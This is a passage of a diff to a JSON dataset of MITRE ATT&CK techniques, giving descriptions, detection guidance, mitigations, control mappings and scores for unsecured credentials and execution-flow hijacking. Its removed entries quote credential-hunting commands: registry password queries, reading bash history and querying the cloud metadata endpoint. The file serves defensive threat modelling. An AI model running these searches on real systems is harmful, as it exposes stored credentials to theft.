-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1550.004",
-                "name": "Use Alternate Authentication Material: Web Session Cookie",
-                "url": "https://attack.mitre.org/techniques/T1550/004",
-                "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)",
-                "detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
-                "mitigations": [
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    }
-                ]
-            }
+            "Network Traffic: Network Traffic Content"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1573",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1020",
+                "name": "SSL/TLS Inspection",
+                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                "url": "https://attack.mitre.org/mitigations/M1020"
             }
         ],
-        "cumulative_score": 0.3119047619047619,
-        "adjusted_score": 0.3119047619047619,
+        "cumulative_score": 0.3571428571428571,
+        "adjusted_score": 0.3571428571428571,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [
-            "4.7",
-            "5.2",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2"
+            "13.3",
+            "13.8"
         ],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "CM-5",
+            "AC-4",
+            "CA-7",
+            "CM-2",
             "CM-6",
-            "IA-2"
+            "CM-7",
+            "SC-12",
+            "SC-16",
+            "SC-23",
+            "SC-7",
+            "SI-3",
+            "SI-4"
         ],
         "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1619047619047619,
-            "mitigation_score": 0.23636363636363636,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1552",
-        "name": "Unsecured Credentials",
-        "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
-        "url": "https://attack.mitre.org/techniques/T1552",
+        "tid": "T1574",
+        "name": "Hijack Execution Flow",
+        "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.\n\nThere are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.",
+        "url": "https://attack.mitre.org/techniques/T1574",
         "tactics": [
-            "Credential Access"
+            "Defense Evasion",
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n\nMonitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.\n\nMonitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.\n\nAdditionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
+        "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.\n\nLook for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nMonitor for changes to environment variables, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.\n\nService changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.",
         "platforms": [
-            "Azure AD",
-            "Containers",
-            "Google Workspace",
-            "IaaS",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
+            "File: File Creation",
+            "File: File Modification",
+            "Module: Module Load",
             "Process: Process Creation",
-            "User Account: User Account Authentication",
-            "Windows Registry: Windows Registry Key Access"
+            "Service: Service Metadata",
+            "Windows Registry: Windows Registry Key Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1552.001",
-                "name": "Unsecured Credentials: Credentials In Files",
-                "url": "https://attack.mitre.org/techniques/T1552/001",
-                "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)",
-                "detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
+                "tid": "T1574.001",
+                "name": "Hijack Execution Flow: DLL Search Order Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1574/001",
+                "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.",
+                "detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of `.manifest` and `.local` redirection files that do not correlate with software updates are suspicious.",
                 "mitigations": [
                     {
                         "mid": "M1047",
@@ -14338,31 +36884,61 @@
                         "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1044",
+                        "name": "Restrict Library Loading",
+                        "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
+                        "url": "https://attack.mitre.org/mitigations/M1044"
+                    }
+                ]
+            },
+            {
+                "tid": "T1574.002",
+                "name": "Hijack Execution Flow: DLL Side-Loading",
+                "url": "https://attack.mitre.org/techniques/T1574/002",
+                "description": "Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)",
+                "detection": "Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs. Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
+                "mitigations": [
+                    {
+                        "mid": "M1013",
+                        "name": "Application Developer Guidance",
+                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                        "url": "https://attack.mitre.org/mitigations/M1013"
                     },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    }
+                ]
+            },
+            {
+                "tid": "T1574.004",
+                "name": "Hijack Execution Flow: Dylib Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1574/004",
+                "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)",
+                "detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)",
+                "mitigations": [
                     {
                         "mid": "M1022",
                         "name": "Restrict File and Directory Permissions",
                         "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                         "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
                     }
                 ]
             },
             {
-                "tid": "T1552.002",
-                "name": "Unsecured Credentials: Credentials in Registry",
-                "url": "https://attack.mitre.org/techniques/T1552/002",
-                "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s",
-                "detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
+                "tid": "T1574.005",
+                "name": "Hijack Execution Flow: Executable Installer File Permissions Weakness",
+                "url": "https://attack.mitre.org/techniques/T1574/005",
+                "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
+                "detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.",
                 "mitigations": [
                     {
                         "mid": "M1047",
@@ -14371,26 +36947,32 @@
                         "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1052",
+                        "name": "User Account Control",
+                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                        "url": "https://attack.mitre.org/mitigations/M1052"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1552.003",
-                "name": "Unsecured Credentials: Bash History",
-                "url": "https://attack.mitre.org/techniques/T1552/003",
-                "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
-                "detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
+                "tid": "T1574.006",
+                "name": "Hijack Execution Flow: Dynamic Linker Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1574/006",
+                "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the export command, setenv function, or putenv function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s os.environ.\n\nOn Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD are loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) \n\nOn macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the DYLD_INSERT_LIBRARIES environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) ",
+                "detection": "Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes.\n\nMonitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.",
                 "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
                     {
                         "mid": "M1028",
                         "name": "Operating System Configuration",
@@ -14400,11 +36982,11 @@
                 ]
             },
             {
-                "tid": "T1552.004",
-                "name": "Unsecured Credentials: Private Keys",
-                "url": "https://attack.mitre.org/techniques/T1552/004",
-                "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.",
-                "detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
+                "tid": "T1574.007",
+                "name": "Hijack Execution Flow: Path Interception by PATH Environment Variable",
+                "url": "https://attack.mitre.org/techniques/T1574/007",
+                "description": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.\n\nThe PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\\system32 (e.g., C:\\Windows\\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.\n\nFor example, if C:\\example path precedes C:\\Windows\\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\\example path will be called instead of the Windows system \"net\" when \"net\" is executed from the command-line.",
+                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
                 "mitigations": [
                     {
                         "mid": "M1047",
@@ -14413,16 +36995,10 @@
                         "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
                     },
                     {
                         "mid": "M1022",
@@ -14433,39 +37009,66 @@
                 ]
             },
             {
-                "tid": "T1552.005",
-                "name": "Unsecured Credentials: Cloud Instance Metadata API",
-                "url": "https://attack.mitre.org/techniques/T1552/005",
-                "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n",
-                "detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
+                "tid": "T1574.008",
+                "name": "Hijack Execution Flow: Path Interception by Search Order Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1574/008",
+                "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.\n\nSearch order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.\n\nFor example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)\n\nSearch order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
+                "detection": "Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as \"findstr,\" \"net,\" and \"python\"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.\n\nData and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
                     }
                 ]
             },
             {
-                "tid": "T1552.006",
-                "name": "Unsecured Credentials: Group Policy Preferences",
